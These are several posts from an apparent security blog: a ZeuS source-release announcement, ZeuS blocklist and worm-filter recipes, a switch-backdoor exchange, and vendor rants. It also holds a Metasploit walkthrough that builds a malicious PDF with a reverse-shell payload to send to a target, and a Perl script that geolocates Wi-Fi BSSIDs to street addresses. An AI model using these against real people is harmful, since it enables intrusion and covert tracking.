ZeuS 2.0.8.9

Enjoy..

PS – I am in no way responsible for the use of this software. I am distributing it purely for it’s educational value. It’s a really good example of the science behind the bot networks and will, hopefully, help us combat them.

PPS – I just noticed that it includes the binaries.. I would uh, recommend not running those unless you know what you’re doing. Like, say, in a virtual machine that you don’t care about, for example. If you find anything neat, let me know. I’m just starting to go through it myself.

Related posts:

1. Lets see if I still remember how to do this…

So, if you’ve been following some of the other blogs (specifically, Krebs), you’ve probably seen the hubbub about ZeusTracker. If not, I highly recommend you click on that previous link and go read. It’s long, but quite interesting.

ZeuS, if you’re unaware, is a big botnet that’s used heavily in cyber crime. You don’t want to get infected by this. To those who manage networks: You don’t want your users to get infected by this.

ZeusTracker is watching for Zeus C&C traffic via honeypots and documenting the known hosts/domains/IP’s associated with them. They’ve created a nice list that can be easily imported in to iptables, Windows host files, Squid, et. al.

I run Squid on one of the gateways here, so I decided to utilize that to implement this blacklist. Squid makes this incredibly simple, which is also a big plus.

In your Squid config file, you’ll see a section that’s all about ACL’s (access control lists). If you scroll down far enough, you’ll see a section that says:

# INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS

So, the simplest way to implement a blacklist is by adding the following just below that comment. Mine looks like this:

# ZeuS C&C domains
acl blocksites url_regex "/etc/squid/zeus.txt"
http_access deny blocksites

Pretty simple, eh?

‘Course, now you have to create the “zeus.txt” file, otherwise that rule isn’t going to do you any good. If you go to here, you’ll see a list of files that all contain the hosts & ip’s that ZeusTracker knows about. In this case, you want the one formatted for Squid.

Now, you’ll need for this to update, say, daily, so you’ll need to create a script and invoke it via Crontab. Here’s my stupid-simple script:

#!/bin/sh
 
/bin/rm /etc/squid/zeus.txt
/usr/bin/curl "https://zeustracker.abuse.ch/blocklist.php?download=squidblocklist" >> /etc/squid/zeus.txt
/etc/init.d/squid restart

It simply deletes the current zeus.txt file, downloads the newest version via Curl, and then restarts Squid.

This is a really quick & easy way to (help) protect your network from this trojan/worm/whatever you want to call it. I’ve noticed recently that even a user who is running a fully patched version of Windows (Vista), with Google Chrome, this thing is still capable of infecting the machine. I haven’t found any real good information on how, but from what I’ve witnessed, it appears to be a Java exploit.

Anyway, give this a shot!

Related posts:

1. Browser headers and information leaks
2. Botnet Command and Control Methods
3. File Server LNK Protection

No, no, and.. no. Though, that’d be pretty sweet. Minus being assassinated. That would suck.

Honestly, right now, I’m being pulled in like, 73 different directions. which doesn’t leave me with much time for anything else, including a social or blogging life.

But! I expect that I will be able to begin blogging again within the next few weeks and hopefully will return to my regular production level.

I don’t want you guys to fall behind, though.. so let me summarize the past few weeks in the security world:

Microsoft 0day
Microsoft 0day
Stuxnet
Adobe 0day
Java 0day
Microsoft 0day
Adobe 0day
Adobe 0day
…Adobe 0day
Facebook privacy
Julian Assange

There, consider yourself up to date.

No related posts.

First, one big difference. His version of this uses the Google Location Services API. I’ve opted to use the Skyhook service instead because there’s far more documentation and sample code that exists using this API, whereas I was unable to find anything too terribly helpful when it came to using the GLS API for this particular purpose. If anyone has any insight on this, please, please, let me know. I’d like to incorporate that into this script for comparison data.

Ok, so, how does this work, exactly? Both companies (Google & Skyhook) have employed a large number of people to drive around with laptops, GPS’s, and cameras attached to the roofs of their car in order to create a database. Everyone is aware of street view by Google, but were you aware of the fact that they also record wireless information? Well, I guess probably most people are aware of that now, considering the issues they had in Germany, but what you probably weren’t aware of is what this data is used for. Google and Skyhook both provide this database for software based location systems.

So, whats in the database? Skyhook is pretty open about the fact that they’re collecting wifi data in order to provide better location services. They call it “XPS”, which combines information from wifi, GPS, and cell phone towers to pin point an exact location.

Anyway, what does that mean for us? It means that we can query this database with a BSSID from a wireless network and get the nearest address and coordinates returned. Thanks SkyHook!

Here’s an example. Not too long ago I was in the cities and did some driving with a buddy of mine. I’ll demonstrate this using a BSSID that was in the log created on that drive:

$ ./getloc.pl 00:24:B2:1E:24:FE
490 Robert St N
Ramsey county
St. Paul, Minnesota 55101
Latitude: 44.95063
Longitude: -93.0940583

http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=44.95063+-93.0940583&sll=37.0625,-95.677068&sspn=57.815136,114.169922&ie=UTF8&t=h&z=17

So, using just the BSSID I’m able to get a house number (in this case, a building number), street address, and the coordinates.

Here’s my code.. feel free to modify it/add to it/whatever.. but if you add anything cool, please let me know.

#!/usr/bin/perl
# www.attackvector.org
# 
use LWP::UserAgent;
use XML::LibXML;
 
$url = "https://api.skyhookwireless.com/wps2/location";
$ua = LWP::UserAgent->new;
$handler = XML::LibXML->new();
 
$bssid= $ARGV[0];
$bssid =~ s/\://g;
 
if($bssid eq "") {
 print "Usage: $0 <bssid>\n";
 print "Example: $0 AA:BB:CC:DD:EE:FF\n";
 exit(0);
}
 
sub response {
    my ($response) = @_;
    $xml = $response->content;
    $xml =~ s/\n//g;
    $page = $handler->parse_string($xml);
    if((@{$page->getElementsByTagName('longitude')}[0]) ne "") {
        $lat = $page->getElementsByTagName('latitude');  
        $long = $page->getElementsByTagName('longitude');
        $streetnum = $page->getElementsByTagName('street-number');
        $streetname = $page->getElementsByTagName('address-line');
        $city = $page->getElementsByTagName('city');
        $zip = $page->getElementsByTagName('postal-code');
        $co = $page->getElementsByTagName('county');  
        $state = $page->getElementsByTagName('state');
        print "$streetnum $streetname\n";
        print "$co county\n";
        print "$city, $state $zip\n";
        print "Latitude: $lat\n";  
        print "Longitude: $long\n";
        print "http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=" . $lat . "+" . $long . "&sll=37.0625,95.677068&sspn=57.815136,114.169922&ie=UTF8&t=h&z=17\n";
    } else {
        print "No results for $bssid\n";
    }
}
 
$request = "<?xml version='1.0'?>  
<LocationRQ xmlns='http://skyhookwireless.com/wps/2005' version='2.6' street-address-lookup='full'>  
  <authentication version='2.0'>  
    <simple>  
      <username>beta</username>  
      <realm>js.loki.com</realm>  
    </simple>  
  </authentication>  
  <access-point>  
    <mac>$bssid</mac>  
    <signal-strength>-50</signal-strength>  
  </access-point>  
</LocationRQ>";
$response = $ua->post( $url, 'Content-Type' => 'text/xml', Content => $request );
response($response);

If you come up with or know of any creative ways to remotely obtain a BSSID, please comment below. Sammy mentions using XSS, but this only works against the Verizon FiOS router. I’m thinking a Java applet or script and UPnP. I’ll let you know if I come up with anything interesting.

Related posts:

1. Invasion of Privacy.
2. New DLL Hijacking Exploits (many!)
3. Get Fined For Not Password Protecting Your Wireless Network.

Anyway, a penetration testing company named Ramz Afzar has released an unofficial patch to fix the Adobe vulnerability, because apparently Adobe has had a difficult time figuring one out on their own.

After reading their analysis of the vulnerable code, this jumped out at me the most:

After initial analysis we’ve discovered that exploit exists in insecure strcat call located in CoolType.dll:
(all addresses and names are from Latest Acrobat 9.3.4′s CoolType.dll)

0803DDAB E8 483D1300 CALL JMP.&MSVCR80.strcat

So, what does ‘strcat’ do, exactly? It basically appends a copy of the source string to the destination string. Example:

main () {
  char adobe_rulez[20];
  strcpy (adobe_rulez,"our ");
  strcat (adobe_rulez,"software ");
  strcat (adobe_rulez,"pwnz! ");
}

Pretty self explanatory. HOWEVER. What DOESN’T ‘strcat’ (or any of the other strc* functions, for that matter) do? Bounds checking! This is a classic overflow due to idiotic programming practices. Really, Adobe? The 15 years of hounding from security researchers haven’t been enough for you to ingrain it into your programmers that the use of strc* will get them fired, or lynched, or burned at the stake? Beyond that, your entire testing/debugging department missed this as well?

Heres’ what they SHOULD be doing:

#define MAXLEN(s) ( sizeof(s)/sizeof(s[0]) - 1 )
 
char buf[20];
 
void write( char data[], int n ) {
   strncat( buf, data, __min( n, MAXLEN(buf)-strlen(buf)) );
}
 
main() {
   strcat(buf, "now it looks like ");
   write("we know what we're doing");
}

Note: The above code is just an example – I don’t even know if it will compile or not. The idea is simple, though. You define the size of a buffer and you want to ensure that the data going in to that buffer doesn’t exceed the size of the buffer. What a concept. Bounds checking is nothing new, so there are plenty of resources out there to educate those who are unfamiliar with it. But, if you’re getting paid big bucks as a programmer for a company, you should know what the hell you’re doing. Sorry, that’s just my personal opinion. *cough*.

Anyway, So, first they’re writing code using functions that have been known to be vulnerable to exploitation for about 15 years and second, they’re now being shown up by little companies who are writing patches to fix the holes that they’re not. And apparently Adobe thinks it’s okay for this vulnerability to be left unpatched until the 4th of October?? Are you kidding me??

I caught some grief when I wrote the Open Letter to Microsoft post about how it’s difficult to write code in a team setting and that it’s difficult for large companies to meet deadlines and whatnot, but honestly, how do you argue with this?

And, whats more, is that a company that does not have access to the source code of the DLL was able to fix the issue, yet the company responsible for the software is not/wont/doesn’t care/can’t find a way to patch it on an expedited schedule? Seriously, this October 4th date is really feels like a, “Eh, we don’t mind that all of our customers are vulnerable to exploitation and corporate espionage.. we’ll patch it when we get around to it” kind of date.

Whats more, is that Adobe has apparently released a statement telling people to not install 3rd party patches or from “untrusted” publishers. So, instead, just remain vulnerable until we get off our ass and do something about it.

Tell you what, Adobe, if you can’t figure out how to simply add some bounds checking to a routine and release a patch, I think maybe you are the “untrusted publisher”.

So, here are your options:

1) Uninstall Adobe (highly recommended. Once this vulnerability is patched, there will be 6 more released, I’m sure – here’s a list of all the vulnerabilities and associated exploits against Adobe products. Look at how many came out in the past 60 days (granted, a chunk of them are DLL hijacking, but even ignoring those ones…)) Some options to replace Adobe include:
A) Install the Google Docs plugin and read your PDF’s from within Google Docs (this is what I do)
B) Install one of the many other software packages out there:
* Evince
* Foxit (Foxit is often vulnerable to the same issues as Adobe, though, so be a bit weary of this one)
* Okular
* GSView
* Xpdf
* NitroPDF
* SumatraPDF
* Please note that I haven’t used all of these, so if you have any input on them, please comment below
2) Install this patch
3) Or wait around for Adobe to do something about it, meanwhile leaving you vulnerable to attack. Though, I’m sure there’s nothing important on your computer that you wouldn’t mind being stolen, right?

Sorry about this rant, I’m just getting tired of these companies writing absolutely terrible code, laughing at us as they head off to the bank with our money and then not taking it seriously when they get flooded with vulnerability discoveries. I’m looking forward to the day when some big company gets pwned due to a vulnerability in a piece of software that a publisher has had ample time to patch and then gets sued for damages. That’s when the face of internet security will change, because I guarantee that if you assign a price tag to apathy, we will begin to see same-day patches.

Oh, wait, we do already see that.. with Linux. *plug*.

Related posts:

1. New Adobe 0day Demonstration
2. New DLL Hijacking Exploits (many!)
3. DLLHijackAuditKit v2

IDG News Service – A hacker who claims he was behind a fast-spreading e-mail worm that crippled corporate networks last week said that the worm was designed, in part, as a propaganda tool.

The hacker, known as Iraq Resistance, responded to inquiries sent to an e-mail address associated with the “Here you have” worm, which during a brief period early Thursday accounted for about 10 percent of the spam on the Internet. He (or she) revealed no details about his identity, but said, “The creation of this is just a tool to reach my voice to people maybe… or maybe other things.”

He said he had not expected the worm to spread as broadly as it had, and noted that he could have done much more damage to victims. “I could smash all those infected but I wouldn’t,” said the hacker. “I hope all people understand that I am not negative person!” In other parts of the message, he was critical of the U.S. war in Iraq.

On Sunday, Iraq Resistance posted a video echoing these sentiments and complaining, through a computer-generated voice, that his actions were not as bad as those of Terry Jones. Jones is the pastor at a small Florida church who received worldwide attention this week for threatening to burn copies of the Koran.

Security experts agree that the worm could have caused more damage. However, it did include some very malicious components, such as password logging software and a backdoor program that could have been used to allow its creator to control infected machines. But because the software was not terribly sophisticated, it was quickly shut down as Web servers that it used to infect machines and issue new commands were taken offline last week.

“Here you have” spread when victims clicked on a Web link and then allowed a malicious script to run on their computer. It is the more-successful follow-up to an August worm that included the e-mail address that Iraq Resistance used to communicate with the IDG News Service.

According to Cisco, the worm accounted for between 6 percent and 14 percent of the world’s spam for a few hours Thursday. It primarily gummed up corporate e-mail networks in the U.S.

It is the first worm in years to have such a widespread and noisy effect, hearkening back to the days of the Anna Kournikova worm. Nowadays, most malware writers don’t want to draw attention to their activities, because they generally want to keep their malicious software hidden away on victims’ computers as long as possible.

Disney, Proctor and Gamble, Wells Fargo and the U.S. National Aeronautics and Space Administration (NASA) are among the organizations reported to have been hit by the worm.

SecureWorks Researcher Joe Stewart believes that Iraq Defense is a Libyan hacker who is trying to gain followers for a cyber jihad hacking group called Brigades of Tariq ibn Ziyad.

Tariq ibn Ziyad was the eighth century commander who conquered much of Spain on behalf of the Umayyad Caliphate. Iraq Resistance’s YouTube video has a Spanish theme too. It shows a map of Andalucia, and Iraq Resistance lists his location as “Spain” in his YouTube profile.

In his e-mails, Iraq Resistance did not answer questions about his identity, saying that he was worried about his safety. “I think this information is enough for you and having more looks like [an] investigation,” he said. “I don’t see myself that criminal.”

Robert McMillan covers computer security and general technology breaking news for The IDG News Service. Follow Robert on Twitter at @bobmcmillan. Robert’s e-mail address is robert_mcmillan@idg.com

Related posts:

1. Life of a Computer Hacker Revealed. A Blast From the Past.
2. Convincing End Users That Black is White
3. Malware/Spyware and your credit card.

“…that we all feared might happen someday…”? Where has this chick been? ANYWAY…..

Whenever I hear about an email worm going around an infecting people left and right, I kind of chuckle to myself. These are absurdly easy to block, yet no one seems to do it. I’m in charge of all the network operations at the company that I work for and it’s a relatively small company, yet we’ve never been hit by any of the major email worms that have surfaced over the years. Why?

Well, it’s simple.. just like spam, there are certain characteristics that are static across all of the emails that are being generated. Yes, sometimes they’re more difficult to pinpoint than others, but usually (as is the case here), it’s trivial.

From all of the samples that I’ve seen, we’re dealing with two different subject lines. Obviously, the creators of this worm were not interested in filter evasion, otherwise they would have created an array of thousands of different subject lines and messages. That, in addition to thousands of random file names and websites that are hosting the file, and you’ve got yourself a worm that’s moderately difficult to block. So, you future worm writers of the world, go big or go home.

Anyway, as I’ve mentioned in a previous post, I rely heavily upon Mimedefang to filter email at the gateway. It’s a very straight forward milter for Sendmail that allows you to write custom filters in Perl. And, since I’m sure all of you know about my love for Perl, you can see why I’m immediately drawn to this.

If you’ve never played with Mimedefang, I highly recommend you check it out.

So, on to the filtering. My filter file has, well, lots of rules that accomplish a variety of different tasks. In order to filter this one, though, it’s a simple pattern match:

   if(/^.*?Subject\:\s+here you have.*/i || /^.*?Subject\:\s+just for you.*/i) {
      foreach $recip (@Recipients) {
      delete_recipient($recip);
   }
   add_recipient('spam@localhost');
   action_change_header('Subject', "BANNED - VIRUS - $Subject");
}

Trivial. You place this under the “filter_begin” routine. Also, in order to get access to the headers, there are two files which Mimedefang stores. One is called “COMMANDS” and one is called “INPUTMSG”. You’ll want to open the “INPUTMSG” file in order to parse the subject line.

Example:

open(F, "./INPUTMSG") || die "$!";
while() {
   if(/^.*?Subject.......blah blah blah
}

Anyway, this is just a simple example of a way to take care of some of these lame worms at the gateway so that your end users never even see them. Mimedefang, like pretty much everything else I use, is free. So, it always gives me a warm fuzzy when large companies (ABC, NASA, etc.) get pwned by some lame worm when they run like, $50,000 email filtering systems, yet my simple little Perl script and Mimedefang somehow has kept us protected.

Some of you are probably thinking, “Yeah, but if you had the amount of emails coming through that those guys do, your Perl script would kill your box”

Trust me, I thought about that ahead of time. The one nice thing about milters, in general, is that they’re written in C and are usually pretty quick and not super resource intensive.. so the idea of running a milter that delegates the task of filtering to a scripting language was definitely a concern. However, on this box, which is a Pentium 2.8ghz dual core (11,205.53 bogomips total), the load average stayed below 2 all the way up to 250 emails a minute. Sure, this is not a solution for the Gmail’s and Yahoo’s of the world, but does your company receive 250 emails a minute? Probably not.

Also, I’ve written in some throttling to ensure that it backs off if the load increases too significantly.

Anyway, if you have any questions about filtering with Mimedefang, let me know.. if inadvertently become pretty well versed in it.

Related posts:

1. Handling Spam at the Network Level
2. ALERT: New virus spreading
3. UPDATED: Picpaste & Filename Enumeration. Or, How To Get Free Porn.

I then issued my response, and CK commented with the steps to take to help to secure your router/switch that is vulnerable to this backdoor. Thanks CK!

Here’s the exchange plus the fix:

hi, Matt,
Thanks for bringing up this security issue.
In order to help customer who forgot the password and doesn’t want to loss the configuration to login the switch to change the existing password. So we provided this mechanism if customer provide us the MAC address of the his switch, we will generate a unique password for such switch for him/her. It is regret the it come out to be a security issue.

Last year, when we received this information that somebody break the algorithm, we had already changed our firmware so that this password can’t be used via Telnet, Web etc protocol via network. Only when the administrator can physically reach the switch via console login, then this password is valid.

Some of the switches which had been phased out may still have the problem, If any customer has such concern, please contact us, we will take the full responsibility to help him/her fix the problem.

Thanks again for your attention to prevent people using our switches from being attack. It is also our responsibility. Should you have any suggestion or comment, please feel free to contact me.

Best Regards
C.K.NG

@CK: I understand your argument, but my take is this:

If, say, 2% of your customer base forget their passwords and have to reset their devices and start from scratch, why would you put the other 98% of your customer base at risk for getting owned? Personally, if I ran one of your routers/switches/whatever and found out that I had lost trade secrets or valuable information due to a hole that your company intentionally put in to my router/switch, you would have a lawsuit on your hands.

It is not your responsibility to provide a way for your customers to log in to their device if they’ve forgotten their password. If they’ve made the mistake of setting a password and not documenting it, remembering it, something, that is not your company’s issue – it’s theirs. And, if they have to reset their router/switch as a result of their carelessness, maybe the task of reconfiguring the router will make them be a little more diligent the next time.

All of us have forgotten our passwords to something at some point in our lives. I’ve hit the “reset” button on many devices in my day due to not having documented a password. This is my own fault and I accept that.

Dear Matt,
Thanks for your comment, you are absolutely correct. but it also showed that our company is care about customer, even they are the 2%.

Anyway I think if customer use the switch properly, it won’t be attacked by the super password issue.

Firstly, normally customer will separate the user vlan from management vlan, so user can reach the switch.

Secondary, even if user and switch in the same vlan (subnet), or the management vlan can be accessed by routing, we still have a way to prevent switch from attack,

by using the command showing below, only specified management IP can access the switch.

Console#config
Console(config)#management ?
all-client Adds IP addresses to SNMP, Web and Telnet groups
http-client Adds IP addresses to the Web group
snmp-client Adds IP addresses to the SNMP group
telnet-client Adds IP addresses to the Telnet group
Console(config)#management all-client ?
A.B.C.D Starts IP address
Console(config)#management all-client 192.168.1.1 ?
A.B.C.D Ends IP address

Console(config)#management all-client 192.168.1.1 192.168.1.10

only IP address within 192.168.1.1-10 can access the switch via telnet, http, snmp or all

using this way, user also can’t get mac of the switch via SNMP

Please comment if it address your connern. Thanks.

Please also don’t forget to change the default username and password

Console(config)#no username guest
Console(config)#no username admin
Console(config)#username ck_ng password 0 Support
Console(config)#enable password level 15 0 Support

From log you can also see who is login to the switch

Console#sh log ram

[488] 02:11:09 2001-01-01
“LoginSuccess,__super,WEB,10.2.32.162″

[20] 00:11:58 2001-01-01
“LoginSuccess,ck_ng,Console,10.2.4.21″
level: 6, module: 5, function: 1, and event no.: 1

[18] 00:11:34 2001-01-01
“LoginFailure,guest,Console,10.2.4.21″

[15] 00:09:29 2001-01-01
“LoginFailure,admin,Console,10.2.4.21″
level: 6, module: 5, function: 1, and event no.: 1

Thank you CK for providing us with a workaround. I’m sure there are a lot of people who run Accton based switches that will find this information useful.

Related posts:

1. Backdoor Password in Accton Based Switches
2. Browser headers and information leaks
3. AlienTechnology ALR-9900 = lolz.

It has just been announced that this is actively being exploited in the wild, which definitely makes it more serious than it was a day ago. Here’s a great writeup of the malware that’s taking advantage of it.

And here’s a link (CVE-2010-2883) to the advisory that Adobe released.

And here’s the exploit code in the PDF that’s circulating in the wild:

Now that we’ve got all of that out of the way, lets play with the new Metasploit module that’s included in the most recent revision, though it’s pretty straight forward and as simple as all the previous Adobe Reader exploits that I’ve demo’d here..

msf exploit(adobe_cooltype_sing) > set filename test.pdf
filename => test.pdf
msf exploit(adobe_cooltype_sing) > set outputpath /tmp
outputpath => /tmp
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.55
LHOST => 192.168.0.55
msf exploit(adobe_cooltype_sing) > exploit

[*] Started reverse handler on 192.168.0.55:4444
[*] Creating ‘test.pdf’ file…
[*] Generated output file /tmp/test.pdf
[*] Exploit completed, but no session was created.

Ok, now in the /tmp directory, there’s a “test.pdf” file. Send this to the target and then you’ll need to start the handler..

msf exploit(adobe_cooltype_sing) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.55
lhost => 192.168.0.55
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.55:4444
[*] Starting the payload handler…

Now, when the target clicks on the PDF, you’ll get a command shell.

I have had mixed results using this exploit, so if anyone has had really successful experience with it, please let me know. Maybe I’m overlooking something, but I’ve tested it against multiple XP boxes running a wide range of different versions of Adobe and I’d say that I’m at about a 20% success rate.

Related posts:

1. Autorun DLL Hijacker (USB stick)
2. Alternative DLL Hijacking Method
3. Windows ‘LNK’ Exploit Demonstration

I have watched you develop as a company, starting with Windows 3.1. It was most peoples first experience with a PC and considering that there was really no other marketed OS (Linux was brand new and not really totally “usable” yet. I ran it, but it was not for the faint of heart. All the other Unices were geared toward infrastructure use, not home use) that allowed you to multitask, had a GUI, and was in color, you had the lions share of the market.

Security wasn’t much of an issue back in these days. There were no home networks, most people had never been on the internet, and the web had just come into existence. You had a free pass.

Then, in 1995, you raised the bar with Windows 95. This was epic. More colors, way more features, and more software. Oh, and networking was built in to the core of the OS. Now everyone was getting online. This was great for society, but not so great for you, Microsoft, as this is when the public started to realize that the code you were producing was, well, terrible at best.

What really set this off was “WinNuke”, you remember, I’m sure. Just a simple TCP connection to port 139 and sending “msg_oob” caused Windows 3.1, 95 and NT to crash. Remember? This is when the term “Blue Screen of Death” was made mainstream.

As a result, bored kids worldwide began to dig deeper and try to come up with new ways to make Windows crash. Initially, this was to knock people off of IRC (Internet Relay Chat), but it grew. Lets run down the list of TCP stack issues you encountered back in the mid to late 90′s:

* Winnuke
* TearDrop
* TearDrop v2 (yes, v2.. you remember, you screwed up in your attempt to patch for v1…)
* NewTear (…yeah, not even going to comment on this one)
* Boink
* Bonk
* Frag
* Nestea
* Nestea v2 (…another wonderful patch job)
* Sping
* Jolt
* Land

All of those caused Windows 3.1 – 98 to crash. That’s right, a user could be sitting at their computer and boom, blue screen. This wasn’t a huge issue at first, because it was limited to people on IRC, for the most part. It didn’t affect home users, because they weren’t being targeted… that was until someone wrote a perl script to run a few of these attacks against incrementing IP addresses starting with 1.1.1.1. I vaguely recall hearing something about NASA being downed by this attack.. hmmm.

Beyond the denial of service attacks, you also encountered all of the issues with IIS. I honestly don’t even know where to begin with IIS. Thanks to you and the developers of IIS, we saw the internet get owned in a multitude of ways. The first were individual hacker groups owning just about every website they’d come across. The White House, FBI, CIA, NASA, and just about every other government organization was among these who had their website defaced. We wont even begin to mention the millions of company websites that were owned. I do remember hearing something about a classified memo from the high ups in Microsoft indicating that there shall be “no internet facing Windows boxes”. You expected your users to run your software, but refused to yourself and wound up using a de-badged version of Apache running on some perverted version of *nix to host your website.

Beyond that, we have countless internet worms that all target vulnerabilities/weaknesses in the Windows product. Lets take a look at the list (with damages included where possible):

* Melissa – $1,200,000,000
* ILOVEYOU – $15,000,000,000
* Anna Kournikova
* Sandmind
* Sircam – $1,000,000,000
* Code Red – $2,000,000,000
* Code Red II (another wonderful patch job?)
* Nimda – $635,000,000
* SQL Slammer – $750,000,000
* Blaster – $320,000,000
* SoBig – $37,100,000,000 (whoa.)
* Sober
* MyDoom – $38,000,000,000 (whoa!)
* Sasser – $500,000,000
* Conficker – $9,100,000,000

I could go on and on, but those are the big ones. So, totaling all of those up, you’ve cost us around $105,605,000,000 (one-hundred and five billion dollars). This is interesting, because if Ford released a car that was so faulty that it caused $105,605,000,000 dollars to US citizens, you had better believe that there would be a huge class act lawsuit AND a good chance that Ford would no longer be in business… yet, somehow, you’ve managed to make it all this time unscathed, except for the antitrust business, which you brought on yourself.

But, you haven’t stopped. Just about every single day a new vulnerability is discovered in your code, with exploits to follow. They’re being released publicly, or sold on the black market, because, apparently, you, Microsoft, think that paying a “bug bounty” is not a good idea. Well, I suppose it’s not a good idea if you use buggy, vulnerable software as motivation to upgrade to newer, more buggy software, but there will come a time where, hopefully, people grow tired of constantly getting owned.

They’ve become so accustomed to getting hacked in some form or another, that they don’t even think about it anymore. “Oh, yeah, I got a virus and had to buy a new computer”, “my computer is so fricken slow because of spyware, I’m just going to buy a new one”, “I don’t open attachments from anyone anymore.. the last time I did someone stole my bank account information”, etc. etc.

I wonder what part of the national debt you’ve contributed to, Microsoft. You claim that you’re spending millions upon millions of dollars focusing on security, but the fact of the matter is, you’re failing. Just last week a bug was rediscovered (DLL hijacking) that was initially brought to your attention 10 years ago. 10 YEARS AGO! But, you’re so arrogant that you decided to just ignore it. I’m sure the mentality of it was, “well, if this thing gets out and people start getting hacked, we can sell them a new version of Windows!”

Just remember, Microsoft, that when people begin to get tired of having their bank account information stolen and having to buy new computers because they run an operating system that is written by the marketing department, you’ll just be a blip on a timeline comparable to the bubonic plague.

Sincerely,
Matt
AttackVector.org

For those interested in finding an OS that’s better, more stable, more secure (ie – you can browse the web again without having to worry about getting spyware, viruses, or what links you click on.. ooooooo!), visit the following links:

Ubuntu Linux – probably the easiest distribution of Linux to use/run/operate. Great for people interested in trying out Linux (it can run on a live-cd, or USB stick)
www.ubuntu.com

Wonder what Linux looks like?

Not sure Ubuntu is right for you? Here’s a list of a bajillion other Linux distros:
Linux.Org/dist

Worried about what software? Office programs, etc?
Linux.org/apps

Really can’t totally move over to Linux? How about running Windows under Linux?
VMWare Player

Worried about price? Well, if you haven’t heard, Linux is free, and so is about 99% of the software available for it. How can it be free?
How can free software compete with commercial developers?

Related posts:

1. Damn Vulnerable Linux (DVL)
2. Top 10 Ways To Protect Yourself Online
3. The Hackers Behind Stuxnet